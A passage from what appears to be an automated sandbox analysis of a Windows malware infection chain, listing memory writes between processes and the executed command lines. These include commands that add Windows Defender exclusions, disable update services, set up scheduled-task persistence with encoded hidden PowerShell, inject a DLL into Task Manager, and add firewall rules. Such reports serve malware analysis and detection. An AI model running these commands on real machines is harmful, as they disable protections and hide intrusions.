PID 2452 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
PID 2452 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
PID 1380 wrote to memory of 2440 N/A N/A C:\Users\Admin\AppData\Local\Temp\F00D.exe
PID 1380 wrote to memory of 2440 N/A N/A C:\Users\Admin\AppData\Local\Temp\F00D.exe
PID 1380 wrote to memory of 2440 N/A N/A C:\Users\Admin\AppData\Local\Temp\F00D.exe
PID 1380 wrote to memory of 2440 N/A N/A C:\Users\Admin\AppData\Local\Temp\F00D.exe
PID 1380 wrote to memory of 796 N/A N/A C:\Users\Admin\AppData\Local\Temp\F136.exe
PID 1380 wrote to memory of 796 N/A N/A C:\Users\Admin\AppData\Local\Temp\F136.exe
PID 1380 wrote to memory of 796 N/A N/A C:\Users\Admin\AppData\Local\Temp\F136.exe
PID 1380 wrote to memory of 796 N/A N/A C:\Users\Admin\AppData\Local\Temp\F136.exe
PID 1400 wrote to memory of 240 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 1400 wrote to memory of 240 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 1400 wrote to memory of 240 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 1400 wrote to memory of 240 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 1400 wrote to memory of 240 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 1400 wrote to memory of 240 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 1400 wrote to memory of 240 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 240 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
PID 240 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
PID 240 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
PID 240 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
PID 240 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
PID 240 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
PID 240 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
PID 2756 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe
PID 2756 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe
PID 2756 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe
PID 2756 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

Processes

C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe

"C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\EC81.exe

C:\Users\Admin\AppData\Local\Temp\EC81.exe

C:\Users\Admin\AppData\Local\Temp\ED7B.exe

C:\Users\Admin\AppData\Local\Temp\ED7B.exe

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\EED4.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe

C:\Users\Admin\AppData\Local\Temp\F00D.exe

C:\Users\Admin\AppData\Local\Temp\F00D.exe

C:\Users\Admin\AppData\Local\Temp\F136.exe

C:\Users\Admin\AppData\Local\Temp\F136.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe

C:\Users\Admin\AppData\Local\Temp\F2DC.exe

C:\Users\Admin\AppData\Local\Temp\F2DC.exe

C:\Users\Admin\AppData\Local\Temp\FEBF.exe

C:\Users\Admin\AppData\Local\Temp\FEBF.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe

C:\Users\Admin\AppData\Local\Temp\458F.exe

C:\Users\Admin\AppData\Local\Temp\458F.exe

C:\Users\Admin\AppData\Local\Temp\483F.exe

C:\Users\Admin\AppData\Local\Temp\483F.exe

C:\Users\Admin\AppData\Local\Temp\4A62.exe

C:\Users\Admin\AppData\Local\Temp\4A62.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\5932.exe

C:\Users\Admin\AppData\Local\Temp\5932.exe

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=4A62.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0

C:\Windows\system32\taskeng.exe

taskeng.exe {145A503E-3F30-46DD-B868-395E7AFEB9B4} S-1-5-21-2085049433-1067986815-1244098655-1000:AHLBRYJO\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\7zS5BD6.tmp\Install.exe

.\Install.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2572 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\7zS6E5D.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 256

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gDwEUxeEG" /SC once /ST 03:01:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gDwEUxeEG"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Users\Admin\AppData\Local\Temp\C29F.exe

C:\Users\Admin\AppData\Local\Temp\C29F.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {466328DC-34B7-4775-A8F3-4755863DD1C3} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gDwEUxeEG"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 06:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\OhvJeSu.exe\" 3Y /DEsite_idGOt 385119 /S" /V1 /F

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231026063745.log C:\Windows\Logs\CBS\CbsPersist_20231026063745.cab

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\OhvJeSu.exe

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\OhvJeSu.exe 3Y /DEsite_idGOt 385119 /S

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gPkGGKDmy" /SC once /ST 03:59:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gPkGGKDmy"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gPkGGKDmy"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\wUBDPVxDQVpvNZiy\mmlUJVfV\cMhuwqGgykdXRrvz.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\wUBDPVxDQVpvNZiy\mmlUJVfV\cMhuwqGgykdXRrvz.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-2014310879-82257179-1883772646-11490025932025401429-1824233437-18252139921068948178"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

